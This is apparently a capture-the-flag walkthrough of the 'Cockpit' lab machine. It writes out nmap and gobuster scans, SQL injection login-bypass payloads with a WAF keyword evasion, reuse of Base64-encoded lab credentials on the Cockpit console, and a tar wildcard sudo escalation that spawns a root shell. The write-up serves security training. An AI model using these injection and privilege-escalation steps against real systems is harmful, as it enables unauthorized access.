TL;DR
This writeup is based on the Cockpit machine. I began with an Nmap scan revealing SSH (22), HTTP (80), and Cockpit (9090). Enumeration of the web server uncovered a /login.php page. I bypassed the login using a SQL Injection payload (admin' and 1=1 -- -), avoiding a WAF filter that blocked OR payloads. Inside the admin dashboard, I found Base64 encoded credentials for the user james. I used these credentials to log into the Cockpit web console and access a terminal. Finally, I exploited a Tar Wildcard Injection vulnerability in a sudo command to gain Root privileges.
Scanning Network
I began with an Nmap scan to identify open ports and running services.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
sudo nmap -sS -sV -sC -T4 -p- -v 192.168.128.10 -oN scans/fullport.scan
Nmap scan report for 192.168.128.10
Host is up (0.063s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
| 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: blaze
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
9090/tcp open http Cockpit web service 198 - 220
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Did not follow redirect to [https://192.168.128.10:9090/](https://192.168.128.10:9090/)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We discovered three open ports:
22 (SSH):
OpenSSH 8.2p1running on Ubuntu.80 (HTTP):
Apache httpd 2.4.41hosting a site titled “blaze”.9090 (HTTP/SSL):
Cockpit web service.
Enumeration
I navigated to http://192.168.128.10 and found a simple landing page promoting a Masterpiece of a product.
I performed a directory brute-force scan to identify hidden paths using gobuster.
1
gobuster dir -t 50 -u [http://192.168.128.10/](http://192.168.128.10/) -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x php,html,txt -s 200 -b ""
1
2
3
4
5
/login.php (Status: 200) [Size: 769]
/index.html (Status: 200) [Size: 3349]
/. (Status: 200) [Size: 3349]
/blocked.html (Status: 200) [Size: 233]
/db_config.php (Status: 200) [Size: 0]
The scan revealed a critical file: /login.php.
I visited http://192.168.128.10/login.php and was presented with a login page.
Exploitation
SQL Injection (Login Bypass)
Considering the application is using PHP language and there is a login page, the quick assumption was to try SQL injection.
I attempted to inject a single quote ' into the username field. The application responded with a verbose MySQL error, confirming the assumption.
This error confirms the backend is vulnerable and likely uses LIKE statements to filter credentials.
I attempted a standard bypass using the OR operator:
1
admin' or 1=1 -- -
However, this payload triggered a security filter, and I was redirected to /blocked.html.
Assuming the application was blacklisting the OR keyword, I modified my payload to use AND instead:
1
admin' and 1=1 -- -
This payload successfully bypassed the filter and the authentication check, granting me access to the Admin Dashboard.
The dashboard revealed a list of users and their passwords, which appeared to be Base64 encoded.
| Username | Password (Encoded) |
|---|---|
| james | Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI= |
| cameron | dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy |
I decoded the passwords found on the dashboard. Using the decoded credentials for the user james, I attempted to log in to the Cockpit service running on port 9090 (https://192.168.128.10:9090).
The login was successful, granting me access to the system management interface.
Once inside, I navigated to the Terminal tab on the left sidebar, which provided me with a fully interactive shell as james.
Post Exploitation
I checked the sudo privileges for the james user.
1
2
3
4
5
6
james@blaze:~$ sudo -l
Matching Defaults entries for james on blaze:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on blaze:
(ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *
The output shows that I can run tar as root with the wildcard * argument. This allows for a Wildcard Injection attack. When the shell expands *, it includes filenames in the current directory.
With the reference of GTFOBins, sudo command allows the wildcard *, I can exploit shell expansion. By creating files named strictly after the --checkpoint flags, I can force tar to interpret them as execution instructions rather than filenames.
1
sudo /usr/bin/tar -czvf /tmp/backup.tar.gz * --checkpoint=1 --checkpoint-action=exec=/bin/sh
This box demonstrated a chain of misconfigurations starting with a custom web application vulnerable to SQL Injection (bypassing a simple WAF). This led to an Information Disclosure of encoded credentials in the admin dashboard. Reusing these credentials granted access to the Cockpit web console and a user shell. Finally, a loose Sudo configuration for tar allowed for Privilege Escalation via Wildcard Injection.
Thanks for reading this far. If you enjoyed the writeup, do support me here.









